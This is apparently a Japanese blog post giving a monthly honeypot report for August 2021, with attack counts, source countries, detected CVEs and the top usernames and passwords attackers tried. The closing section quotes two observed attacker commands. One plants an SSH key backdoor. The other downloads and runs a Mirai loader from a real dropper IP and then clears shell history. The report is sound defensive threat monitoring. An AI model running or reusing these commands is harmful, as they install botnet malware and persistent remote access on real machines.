ハニーポット運用(月次報告:2021年8月)
今月のTopics
情報セキュリティ10大脅威 2021 が公開された。 www.ipa.go.jp
「スマホ決済の不正利用」(個人編1位)
個人編の「第1位 スマホ決済の不正利用」は周辺諸国と比較してIT化が遅れてきた日本がキャッシュレス決済の推進により注力すべきセクターになる。まだまだ普及しないマイナンバーカードと連携したITサービスの普及に向けて新規に発足したデジタル庁の積極的な活動が高齢化率が世界1位となった日本の巻き返しの起爆剤となってほしい。
「テレワーク等のニューノーマルな働き方を狙った攻撃」(組織編3位)
組織編では「【3位】テレワーク等のニューノーマルな働き方を狙った攻撃」が新規にランクインしている。2020年から始まったリモートワークも体制が整いつつあり、今後はVPNより効率的なサービスのリリースが見込まれると期待したい。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2021年8月1日-2021年8月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No | ハニーポット | 件数 | 先月比 |
---|---|---|---|
1 | Cowrie | 1875906 | 159,463 |
2 | Honeytrap | 577665 | ▲248,060 |
3 | Heralding | 505508 | ▲682,837 |
4 | Dionaea | 455057 | 101,030 |
5 | Rdpy | 94085 | ▲12,205 |
6 | Ciscoasa | 33828 | ▲68 |
7 | Mailoney | 16355 | 1,831 |
8 | Adbhoney | 15458 | 6,191 |
9 | ElasticPot | 7550 | 6,329 |
10 | Tanner | 4934 | ▲341 |
11 | CitrixHoneypot | 1519 | ▲110 |
12 | ConPot | 1496 | ▲86 |
13 | Medpot | 142 | ▲6 |
- Result
- 他のハニーポットの調査件数が減る中でCowrieへのアクセスが継続して多かった。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
No | 攻撃元の国名 | 件数 | 先月順位 |
---|---|---|---|
1 | China | 730,648 | 3(↑) |
2 | Netherlands | 567,144 | 1(↓) |
3 | United States | 492,469 | 4(↑) |
4 | Russia | 373,435 | 2(↓) |
5 | India | 99,081 | 9(↑) |
6 | France | 93,956 | 6(→) |
7 | Singapore | 85,728 | 8(↑) |
8 | Brazil | 78,177 | 13(↑) |
9 | Indonesia | 65,453 | 17(↑) |
10 | Japan | 61,394 | 10(→) |
11 | Vietnam | 60,102 | 11(→) |
12 | Germany | 56,065 | 15(↑) |
13 | United Kingdom | 55,834 | 20(↑) |
14 | South Korea | 54,772 | 14(→) |
15 | Hong Kong | 44,797 | 圏外(↑) |
16 | Mexico | 35,419 | 圏外(↑) |
17 | Taiwan | 29,191 | 圏外(↑) |
18 | Latvia | 26,666 | 16(↓) |
19 | Thailand | 26,552 | 圏外(↑) |
20 | Albania | 25,589 | 圏外(↑) |
- Result
- 中国が久しぶりに1位に返り咲いた。
- ロシアが久しぶりに4位へ後退。変わってアメリカが3位に上がった。まるでメダル争いのようだ。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No | CVE ID | Count |
---|---|---|
1 | CVE-2020-11899 | 1,261,316 |
2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 419 |
3 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 26 |
4 | CVE-2020-11910 | 1 |
5 | CVE-2021-27561 CVE-2021-27561 CVE-2021-27562 CVE-2021-27561 | 1 |
- Result
- 新規の脆弱性なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No | ユーザ名 | 件数 |
---|---|---|
1 | root | 85,576 |
2 | admin | 43,240 |
3 | knockknockwhosthere | 16,731 |
4 | sh | 5,713 |
5 | test | 4,854 |
6 | user | 4,761 |
7 | sa | 4,166 |
8 | nproc | 3,685 |
9 | ubuntu | 3,673 |
10 | postgres | 3,163 |
11 | oracle | 2,433 |
12 | git | 2,142 |
13 | ftpuser | 1,960 |
14 | deploy | 1,444 |
15 | hadoop | 1,435 |
16 | 22 | 1,386 |
17 | guest | 1,337 |
18 | default | 1,291 |
19 | minecraft | 1,270 |
20 | mysql | 1,182 |
21 | support | 1,164 |
22 | www | 1,124 |
23 | testuser | 1,108 |
24 | teamspeak | 1,086 |
25 | nagios | 957 |
26 | server | 942 |
27 | user1 | 907 |
28 | web | 906 |
29 | administrator | 884 |
30 | ftp | 882 |
31 | (empty) | 866 |
32 | www-data | 855 |
33 | tomcat | 836 |
34 | ts3 | 812 |
35 | jenkins | 744 |
36 | student | 715 |
37 | teamspeak3 | 704 |
38 | test1 | 695 |
39 | tester | 693 |
40 | 2Wire | 685 |
41 | !root | 681 |
42 | dev | 674 |
43 | webmaster | 667 |
44 | alex | 663 |
45 | vbox | 647 |
46 | demo | 643 |
47 | steam | 629 |
48 | ts | 605 |
49 | sysadmin | 586 |
50 | testftp | 577 |
- Result
- knockknockwhosthere(3位)を新規に確認した。
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No | パスワード | 件数 |
---|---|---|
1 | knockknockwhosthere | 16,731 |
2 | admin | 14,759 |
3 | 123456 | 11,421 |
4 | 123 | 5,127 |
5 | password | 4,426 |
6 | (empty) | 4,027 |
7 | nproc | 3,681 |
8 | 1 | 3,327 |
9 | 1234 | 3,299 |
10 | 12345 | 3,109 |
11 | root | 2,138 |
12 | test | 1,851 |
13 | 123123 | 1,442 |
14 | 12345678 | 1,413 |
15 | 1qaz2wsx | 1,248 |
16 | 1q2w3e4r | 1,226 |
17 | vizxv | 1,218 |
18 | blank | 1,052 |
19 | pass | 1,009 |
20 | qwerty | 983 |
21 | test123 | 958 |
22 | 123456789 | 952 |
23 | 123321 | 929 |
24 | a | 891 |
25 | P@ssw0rd | 794 |
26 | 123qwe | 790 |
27 | 111111 | 751 |
28 | abc123 | 733 |
29 | p@ssw0rd | 725 |
30 | user | 714 |
31 | passw0rd | 697 |
32 | admin123 | 633 |
33 | password123 | 630 |
34 | 1234567 | 629 |
35 | 12 | 535 |
36 | 1qaz@WSX | 520 |
37 | qwe123 | 508 |
38 | support | 471 |
39 | 666666 | 451 |
40 | pass123 | 423 |
41 | ubnt | 414 |
42 | 1q2w3e | 412 |
43 | changeme | 396 |
44 | qwer1234 | 393 |
45 | backup | 376 |
46 | master | 371 |
47 | 0 | 368 |
48 | q1w2e3 | 366 |
49 | qwerty123 | 351 |
50 | 1q2w3e4r5t6y | 332 |
- Result
- ユーザ名と同じ
knockknockwhosthere
というパスワードのアクセスが急激に増加していた。
SANSのCowrieでも同様のSSH Scanning Activityを観測しているようだ
- ユーザ名と同じ
https://isc.sans.edu/ssh.htmlisc.sans.edu
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- massscanが0件だった。こんな日がくるとは...
- Zmapは相変わらず多い。
最後に
東京オリンピック開催期間直後の8月9日からuser : knockknockwhosthere/pass : knockknockwhosthereのSSH Scanning Activityが急激に増加していた。何らかの製品に起因するアカウントでもなく、特定の国ではなく各国よりアクセスがみられるためオリンピックに起因したものと推測している。
今月多かったアクセス。
コマンド :"cd ~ && rm -rf .ssh && mkdir .ssh && echo ""ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr"">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
- 今月の面白かったアクセス。ビルゲイツ先輩?
IPアドレス:136.144.41.41 コマンド :cd /var/tmp ; curl -s -L -O 31.210.20.142/.billgates/.senpai.loader || wget --no-check-certificate 31.210.20.142/.billgates/.senpai.loader ; chmod 777 .senpai.loader ; ./.senpai.loader ; rm -rf .senpai.loader ; history -c ; rm -rf ~/.bash_history 接続元 :United States
このURL配下の.senpai.loaderへアクセスしてみると難読化されていないシェルスクリプトが表示される。
現役のMiraiのBotnetとのこと。
31.210.20.142
がDropperサイトになる。.senpai.loaderは264行からなるシェルスクリプトで構成されており、環境に合わせて対応するmalwareがダウンロードされるようだ。
こんな感じのスクリプトが延々と...
危険なので、「でりとっ!」 (ばんばん)